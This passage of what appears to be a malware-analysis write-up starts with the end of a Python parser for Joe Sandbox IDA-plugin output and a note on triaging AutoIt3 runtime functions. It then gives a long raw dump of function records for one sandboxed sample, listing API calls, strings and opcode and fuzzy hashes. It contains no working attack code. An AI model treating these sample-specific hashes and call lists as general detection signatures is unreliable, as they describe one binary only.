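            call = _parse_call(sub.group("rest"), sub.group("parent")) if sub else _parse_call(line, None)
            if call:
                records[-1].apis.append(call)
        elif section == "Strings":
            records[-1].strings.append(line)
        else:  # every remaining bullet is a "Key: Value" metadata line
            key, _, value = line.partition(": ")
            records[-1].meta[key] = value
    return records


def find_calls(records: list[FunctionRecord], names: set[str]) -> list[tuple[int, ApiCall]]:
    """(record index, call) for every direct or nested call to an API on the watch list."""
    return [(i, c) for i, r in enumerate(records) for c in r.apis if c.name in names]


def module_histogram(records: list[FunctionRecord]) -> Counter:
    return Counter(c.module for r in records for c in r.apis)
```

Feeding the full section through parse_records and then grouping by meta["Instruction Fuzzy Hash"] or meta["API ID"] is what makes the list manageable: the String ID AutoIt3GUI$Container seen in the OleSetContainedObject record above is the AutoIt window class name, so a large share of these functions are ordinary AutoIt3 runtime code, and the ones worth opening in the disassembler are those whose API set does not match a known runtime function.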
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID: '
                                                                                                        • API String ID: 3850602802-1997036262
                                                                                                        • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                        • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                        • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                        • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
APIs
• _strlen.LIBCMT ref: 0040F858
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
  • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
• _sprintf.LIBCMT ref: 0040F9AE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove$_sprintf_strlen
• String ID: %02X
• API String ID: 1921645428-436463671
• Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
• Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
• Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
• Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
• Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 0045134A
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
• Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
• Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
APIs
• Sleep.KERNEL32(00000000), ref: 00476CB0
• GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
• Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
• Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
• Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
• Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: InternetOpen
• String ID: <local>
• API String ID: 2038078732-4266983199
• Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
• Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
• Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
• Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
• Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
• Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
• Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: _memmove
• String ID: u,D
• API String ID: 4104443479-3858472334
• Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
• Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
• Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • wsprintfW.USER32 ref: 0045612A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend_mallocwsprintf
                                                                                                        • String ID: %d/%02d/%02d
                                                                                                        • API String ID: 1262938277-328681919
                                                                                                        • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                        • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                        • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                        • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                        APIs
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                        • InternetCloseHandle.WININET ref: 00442668
                                                                                                          • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                        • String ID: aeB
                                                                                                        • API String ID: 857135153-906807131
                                                                                                        • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                        • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                        • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                        • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                        • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 529655941-2988720461
                                                                                                        • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                        • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                        • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                        • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                        APIs
                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                          • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                        • String ID: Shell_TrayWnd
                                                                                                        • API String ID: 529655941-2988720461
                                                                                                        • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                        • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                        • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                        • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                        APIs
                                                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                          • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message_doexit
                                                                                                        • String ID: AutoIt$Error allocating memory.
                                                                                                        • API String ID: 1993061046-4017498283
                                                                                                        • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                        • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                        • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                        • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D